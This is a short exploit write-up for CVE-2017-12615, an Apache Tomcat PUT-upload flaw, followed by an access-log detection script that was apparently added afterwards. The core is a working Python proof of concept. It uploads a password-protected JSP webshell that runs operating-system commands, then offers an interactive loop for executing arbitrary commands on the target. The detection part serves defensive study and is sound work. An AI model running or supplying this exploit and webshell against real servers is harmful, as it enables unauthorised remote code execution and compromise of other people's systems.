CVE-2017-12615 Apache Tomcat Arbitrary Code Upload Vulnerability

Introduction

  • A web application server

CVE-2017-12615

1. Description

  • Apache Tomcat 7.0.0 – 7.0.81
  • The HTTP PUT request method is enabled (the readonly initialization parameter is changed from its default value to false)

2. Principle

  • An attacker may be able to upload a JSP file containing arbitrary code to the server through a specially crafted request

3. POC

  • poc.py

      import requests

      url_put = "http://192.168.76.138:8080/{}.jsp/"
      url_exp = "http://192.168.76.138:8080/{}.jsp?&pwd=023&cmd={}"
      filename = str(input("Please enter put file name:"))

      # JSP webshell
      data = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
      <%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
      +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

      # Upload the file with PUT; the trailing slash follows the .jsp name
      res = requests.put(url=url_put.format(filename), data=data)

      # 201 Created means the server accepted the upload
      if int(res.status_code) == 201:
          quit_input = True
          while quit_input:
              cmd = str(input("CVE-2017-12615 is exist!\nplease enter cmd:"))
              if cmd in ['q', 'quit', 'exit']:
                  quit_input = False
                  continue
              res_cmd = requests.get(url=url_exp.format(filename, cmd))
              print(res_cmd.text)

4. EXP

  • Exploiting this vulnerability allows arbitrary commands to be executed
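A detection sketch for the request pattern the PoC above produces, added here as an example and not part of the original post: it scans Tomcat access-log lines for a successful PUT to a path ending in `.jsp/` and lists later requests to the stored file. The log format (AccessLogValve `common` pattern), the function name `find_jsp_uploads` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed format: Common Log Format, as written by AccessLogValve pattern="common".
LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# A JSP/JSPX name followed by a trailing slash, as in the PoC's PUT URL.
JSP_SLASH = re.compile(r'\.jspx?/$', re.IGNORECASE)
# 201 = file created, 204 = existing file overwritten by the DefaultServlet.
WRITE_OK = {201, 204}


def find_jsp_uploads(lines):
    """Return one finding per successful PUT of '<name>.jsp/', with later hits on it."""
    findings = {}
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # not an access-log line in the assumed format
        path = urlsplit(m["target"]).path
        status = int(m["status"])
        if m["method"] == "PUT" and status in WRITE_OK and JSP_SLASH.search(path):
            stored = path.rstrip("/")  # name the file ends up with on disk
            findings.setdefault(
                stored, {"uploader": m["client"], "time": m["ts"], "hits": []}
            )
        elif path in findings and status == 200:
            # A later successful request to the stored JSP means it was executed.
            findings[path]["hits"].append((m["client"], m["method"], m["target"]))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [20/Sep/2017:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 11230
198.51.100.7 - - [20/Sep/2017:10:01:09 +0000] "PUT /docs/readme.txt HTTP/1.1" 201 -
203.0.113.9 - - [20/Sep/2017:10:02:11 +0000] "PUT /a1.jsp/ HTTP/1.1" 201 -
203.0.113.9 - - [20/Sep/2017:10:02:15 +0000] "GET /a1.jsp?&pwd=x&cmd=y HTTP/1.1" 200 48
198.51.100.7 - - [20/Sep/2017:10:03:00 +0000] "PUT /b2.jsp/ HTTP/1.1" 403 -
""".splitlines()

if __name__ == "__main__":
    for name, info in find_jsp_uploads(SAMPLE_LOG).items():
        print(f"{info['time']} {info['uploader']} wrote {name}; later: {info['hits']}")
```

Any finding on a host where PUT is not an intended feature also indicates that `readonly` has been set to `false` for the DefaultServlet, the precondition listed in the description.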
